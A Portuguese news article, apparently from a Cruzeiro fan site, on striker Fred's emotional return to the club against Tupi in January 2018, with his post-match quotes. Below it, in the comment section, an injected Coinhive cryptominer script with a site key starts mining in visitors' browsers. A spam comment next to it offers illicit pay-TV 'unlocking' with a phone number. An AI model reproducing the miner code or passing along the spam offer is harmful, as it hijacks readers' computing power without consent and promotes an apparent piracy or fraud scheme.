logo

18/1/2018 10:07

Emoção, luta e vibração: o reencontro de Fred com a Nação Azul

Emoção, luta e vibração: o reencontro de Fred com a Nação Azul
Fotos: Bruno Haddad / Cruzeiro

Entre os diversos significados para a palavra “emoção” nos dicionários está o termo “agitação de sentimentos”. Em meio aos mais de 42 mil cruzeirenses presentes no Mineirão, o jogo contra o Tupi teve um gosto particular e especial para um deles: Fred.



Cruzeirense desde criança, o camisa 9 é destes casos pouco comuns em que jogadores conseguem realizar o sonho de jogarem futebol pelo time do coração. A realização deste sonho de Fred começou em 2004, quando ainda aos 20 anos deu início a esta história que passou a ser reescrita a partir da noite de 17 de janeiro de 2018.

Desde seus primeiros passos no Mineirão nesta quarta, antes mesmo da bola rolar, era nítido reparar um Fred concentrado, focado, e, ao mesmo tempo, um tanto atônito por reencontrar a Nação Azul, que o recebeu de braços abertos e explodiu ao ver e ouvir seu nome anunciado no telão. Tal qual a definição do dicionário: “uma agitação de sentimentos”. Para todos os lados. Em todos os cantos.

Um dos novatos do elenco para a temporada de 2018, Fred buscou o gol e ajudou seus companheiros desde o início. Quase marcou o seu tento de número 57 com a camisa cinco estrelas em pelo menos duas grandes oportunidades.

Na primeira etapa, se esforçou ao máximo para alcançar um belo passe de Robinho. O camisa 9 foi às redes, mas a bola, não. No segundo tempo, tabela primorosa com De Arrascaeta. Um domínio raro no meio da zaga, mas a bola, caprichosa, passou rente à trave esquerda do goleiro adversário.

Se o gol não saiu, Fred foi bastante participativo. Esteve presente na construção das jogadas dos dois gols celestes e deu ainda duas assistências de classe para De Arrascaeta. Uma delas culminaria em um belo gol, anulado injustamente, no primeiro tempo.

Fred esteve em campo por 90 minutos. Lutou, brigou, e, como torcedor que é, vibrou bastante com os gols de Robinho e Rafinha. O dele fica para uma próxima que, com certeza, será em breve.

FRED FALA

“Para ser sincero, foi um dos jogos em que eu fiquei mais ansioso. Emocionante. Mesmo com toda a experiência que a gente tem e o hábito de jogar em estádio cheio, eu estava muito ansioso para essa reestreia minha aqui. Realmente foi emocionante para todos nós”.

“Todo mundo sabe que sou cruzeirense. Quando fiquei sabendo que nosso torcedor lotou o estádio... Todo mundo em volta falou comigo para eu ficar lá na área, que eu iria achar meus gols. Eu estava com muita vontade de fazer. Talvez isso até me atrapalhou um pouco. Saio feliz pelas movimentações. Sabemos que esse ano vai ser muito puxado, com o calendário apertado. Vamos tentar pegar o ritmo dentro dos jogos”.

“Há 12 anos, na minha estreia no Mineirão, eu entrei no segundo tempo contra o Internacional e fiz um gol. Quando eu vinha jogar aqui contra o Cruzeiro, quando era do Fluminense, a torcida cantava pedindo minha volta. Eu ficava assistndo no YouTube. Aquilo me emocionava. Hoje eu tive um sonho realizado, sem demagogia nenhuma. Algumas coisas que a gente sempre sonhou estão acontecendo. Foi algo emocionante para mim. Minha família inteira esteve aqui hoje também bem à vontade com nosso torcedor. Espero continuar vivendo esse sonho com muitos gols e títulos”.

“O Mano disse com a gente no vestiário após o jogo que fizemos por merecer a torcida ao nosso lado. Pelo pouco tempo de início de trabalho no ano, tivemos muitas boas oportunidades, troca de passes. Fisicamente suportamos bem. Eu que estou chegando agora só quero evoluir e me habituar mais quando nossos pontas e meias pegarem na bola para eu fazer a movimentação certa. Hoje, com poucos dias de treino, eles já me deixaram na cara do gol três vezes".

“Estou muito confiante e esperançoso, sentindo que vão acontecer coisas boas. Temos conversado muito. Para acontecer essas coisas boas, marcas grandes, depende muito do nosso sacrifício e transpiração. Estamos focados nisso”.

“Fiquei abismado com o tanto de bola que chegou para todo mundo. O tanto de oportunidade que nós criamos. E mais ainda pela qualidade técnica do nosso time, toda hora com a bola, um time que erra pouco. De fora eu já olhava e apreciava o futebol do Cruzeiro. E hoje, graças a Deus, estou aqui podendo usufruir de um time com tanta qualidade e tão bem organizado”.

NÃO ACABA QUANDO TERMINA...

Os ponteiros no relógio já ultrapassavam 1h e Fred era o último dos atletas no Mineirão. Paciente, concedeu uma coletiva de imprensa já no estacionamento do estádio. Em seguida, deixou sua mochila no carro e ainda caminhou alguns metros. Pacientemente, atendeu a dezenas de torcedores que por ele esperavam e gritavam seu nome.

Homens, mulheres e crianças formaram uma fila para tirarem fotos e ganharem autógrafos do artilheiro celeste. E toda a “agitação de sentimentos” do jogador parece também ter tomado conta do torcedor. É uma parceria que se reinicia. E que novas páginas heroicas e imortais possam ser escritas.

1767 visitas - Fonte: Site Oficial




Erro ao postar comentário.
Código do erro: 803743

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui.